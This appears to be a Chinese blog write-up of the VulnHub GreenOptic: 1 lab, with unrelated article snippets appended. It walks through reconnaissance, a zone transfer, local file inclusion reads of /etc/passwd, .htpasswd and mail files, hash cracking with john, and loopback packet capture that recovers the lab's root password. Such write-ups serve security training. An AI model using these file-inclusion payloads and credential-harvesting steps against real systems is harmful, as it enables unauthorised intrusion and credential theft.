靶场练习第十九天~vulnhub靶场之GreenOptic: 1

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接:GreenOptic: 1 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -A -sV 192.168.101.123

2.网站的信息收集

(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息

貌似没有什么信息

(2)靶机开放了10000端口,在浏览器中查看一下是否存在有用的信息

发现可能是dns域名解析的问题访问不到http://192.168.101.123:1000,在/etc/hosts文件添加如下信息

192.168.101.123 websrv01.greenoptic.vm

修改完成后,点击刚才页面提示的那个网站

随即进入到登录界面

暂时不知账号密码,先放一放

(3)dirb扫描网站的登录界面

dirb http://192.168.101.123

浏览器登录http://192.168.101.123/account,发现了一个登录界面

虽然没有账号密码登录,但是发现了url可能存在文件包含

http://192.168.101.123/account/index.php?include=/etc/passwd

如上图所示,创建一个文件将这些用户名收集起来,将筛选出来的用户放到username里面

vim user

cat user | grep /bin/bash

vim username

dnsenum --dnsserver 192.168.101.123 --enum greenoptic.vm

(4)找到了另一个域名,设置hosts后访问。发现需要账号密码

dig @192.168.101.123 greenoptic.vm axfr

在/etc/hosts 添加recoveryplan.greenoptic.vm域名

(5)发现一个加密的密码

在view-source:http://192.168.101.123/account/index.php?include=/var/www/.htpasswd一个密码

staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.

(6)用john进行md5解密

cp password password.dc

john --wordlist=/usr/share/wordlists/rockyou.txt password.dc

(7)成功登录http://recoveryplan.greenoptic.vm/

用刚才获取到用户密码登录http://recoveryplan.greenoptic.vm/

进入到key information, 按照提示利用本地文件包含去读terry-/var/mail/terry和sam-/var/mail/sam的邮件,同时下载dpi.zip。 下载好dpi.zip后解压它

cd /下载

unzip dpi.zip

发现解压时需要密码,提示说以邮件形式发送

查看邮件

view-source:http://192.168.101.123/account/index.php?include=/var/mail/sam

利用HelloSunshine123密码解压得出dpi.pcap文件

(7)wireshark流量分析

使用wireshark对dpi.pcap文件进行流量分析

wireshark

1.选择要分析的文件

2.分析

点击统计里面的conversation

tcp流量是当中最多的,可能存在信息

3.找到一组账号密码

alex:FwejAASD1

利用刚才得到用户密码,ssh远程登录

ssh alex@192.168.101.123

3.获取shell

三、漏洞的发现与利用

1.pspy64s监听进程

(1)下载好pspy64s工具到/var/www/html下面

cd /var/www/html

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

将pspy64s工具下载到靶机上

(2)在kali开启一个Http服务

python -m SimpleHTTPServer

(3)远程用户alex下载pspy64s工具

wget 192.168.101.10:8000/pspy64s

(4)提升pspy64s权限

chmod 777 pspy64s

ls -l

(5)启动pspy64s查看进程,寻找可以利用的漏洞

./pspy64s

2.通过流量包分析

用户alex文件夹下有一个wireshark文件夹,同时还发现alex属于wireshark用户组

ls -all

cat /etc/group|grep wireshark

使用dumpcap抓取本地环回地址包一段时间,下载到本地使用wireshark解析。

dumpcap -w test.pcap -i lo

一段时间后ctrl+c退出

将流量包下载到kali上

在靶机

cp test.pcap /tmp/

在kali

scp alex@192.168.101.123:/tmp/test.pcap ./

wireshark

发现有Auth包,base64解码得到了root用户口令ASfojoj2eozxczzmedlmedASASDKoj3o

拿下flag

cd /root

cat root.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375024.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

靶场练习第二十五天~vulnhub靶场之Raven-2

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的…

每天一个linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics(虚拟内存统计)的缩写,可对操作系统的虚拟内存、进程、CPU活动进行监控。他是对系统的整体情况进行统计,不足之处是无法对某个进程进行深入分析。vmstat 工具提供了一种低开销的系统性能观察方…

用TypeScript开发了一个网页游戏引擎,开放源代码

最开始学习电脑编程的原动力之一就是想自己编写游戏,一方面很好奇这些游戏是怎么做出来的,另一方面觉得有些地方设计的不合理,希望电脑游戏既能让人玩的有趣,又不浪费时间。 学校五年,毕业十年,学用了十多种…

靶场练习第二十一天~vulnhub靶场之Momentum-1

一、环境搭建 1.ifconfig查看kali的ip 2.创建靶机 靶机下载地址:Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 寻找靶机ip:nmap 192.168.101.0/24 2.端口扫描 使用命令:nmap -A -T4 -p 1-65535 192.168.101.113,发现开放2…

靶场练习第二十二天~vulnhub靶场之Momentum-2

一、准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,寻找隐藏的网站 gobuster di…

索引深入浅出(8/10):覆盖索引或列包含

在索引深入浅出:非聚集索引的B树结构在聚集表里,在聚集表里,我们看到非聚集索引的叶子层只包含非聚集索引键和聚集索引键。从聚集表结构或堆表结构里拿到剩下列,SQL Server需要进行书签/键查找操作。很多情况下书签或键查找非常消…

靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机…

靶场练习第二十四天~vulnhub靶场之Raven-1

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的…

【知识积累】DES算法之C#加密Java解密

一、前言 在项目需要添加安全模块,客户端调用服务端发布的service必须要经过验证,加密算法采用DES,客户端采用C#进行加密,服务端使用Java进行解密。废话不多说,直接上代码。 二、客户端 客户端采用C#进行开发&#xff…

Space.js – HTML 驱动的页面 3D 滚动效果

为了让我们的信息能够有效地沟通,我们需要创建用户和我们的媒体之间的强有力的联系。今天我们就来探讨在网络上呈现故事的新方法,并为此创造了一个开源和免费使用的 JavaScript 库称为 space.js。该库是 HTML 驱动的,这意味着你不需要在网站上…

离职感言-Symbio的5年工作回顾和总结(转载)

离职感言-Symbio的5年工作回顾和总结 (2011-06-02 21:06:30) 转载▼2005年底,当时我在西安过的还不错,结了婚,买了房,在公司也受老板器重,但是初为人父,孩子带给我的那种人生紧迫感:“再不趁还…

读Pyqt4教程,带你入门Pyqt4 _005

对话框窗体或对话框是现代GUI应用不可或缺的一部分。dialog定义为两个或多个人之间的交谈。在计算机程序中dialog是一个窗体,用来和程序“交谈”。对话框用来输入数据、修改数据、改变程序设置等等。对话框是用户和计算机程序沟通的重要手段。 QColorDialog 颜色对话…

Linux内核的启动过程分析

秦鼎涛 《Linux内核分析》MOOC课程http://mooc.study.163.com/course/USTC-1000029000  一、实验目的及要求: 使用gdb跟踪调试内核从start_kernel到init进程启动 详细分析从start_kernel到init进程启动的过程并结合实验截图撰写一篇署名博客,并在博客文…

四则运算2+psp0

程序要求: 1.题目避免重复 2.可定制(数量\打印方式) 3.可以一下控制参数 ① 是否有乘除法 ② 是否有括号(最多支持十个数参与运算) ③ 数值范围 ④加减有无负数 ⑤除法有无余数 分析:① 如果是两个数…

浅析Kerberos原理,及其应用和管理

文章作者:luxianghao 文章来源:http://www.cnblogs.com/luxianghao/p/5269739.html 转载请注明,谢谢合作。 免责声明:文章内容仅代表个人观点,如有不当,欢迎指正。 --- 一,引言 Kerberos简单来…

asp.net 导出Excel

asp.net 导出Excel 分享一个asp.net 导出假Excel代码。优点,不用借助于任何插件比如(NPOI),复制代码,修改grid.DataSource直接导出。 先看导出后的效果图 1 System.Web.UI.WebControls.DataGrid grid new DataGrid();2 …

bzoj 2300 动态维护上凸壳(不支持删除)

新技能GET。 用set保存点,然后只需要找前趋和后继就可以动态维护了。 1 /**************************************************************2 Problem: 23003 User: idy0024 Language: C5 Result: Accepted6 Time:556 ms7 Memory:4824 kb8 …

《Linux内核分析》 第四节 扒开系统调用的三层皮(上)

黄胤凯 原创作品转载请注明出处 《Linux内核分析》MOOC课程http://mooc.study.163.com/course/USTC-1000029000 一、视频学习 1.系统调用的三层皮:xyz system_call sys_xyz 对应的是API,中断向量对应的中断服务程序,系统调用服务程…

OllyDBG反汇编快速找到程序入口一点分析

出处:http://hi.baidu.com/0soul/blog/item/b62f8f08c2c3c42c6b60fbbe.html 先声明下:这个和脱壳没关系,不是找壳里面的程序入口哦,只是程序本身的入口,个别朋友不要误会哈。其实这个应该是基础,但我经常找…

PHP计划任务之关闭浏览器后仍然继续执行的函数

函数名称:ignore_user_abort 本函数配置或取得使用端连接中断后,PHP 程序是否仍继续执行。默认值为中断连接后就停止执行。在 PHP 配置文件中 (php3.ini/php.ini) 的 ignore_user_abort 选项就是配置处。本功能在 PHP 3.0.7 版之后才开始提供。 官方说明…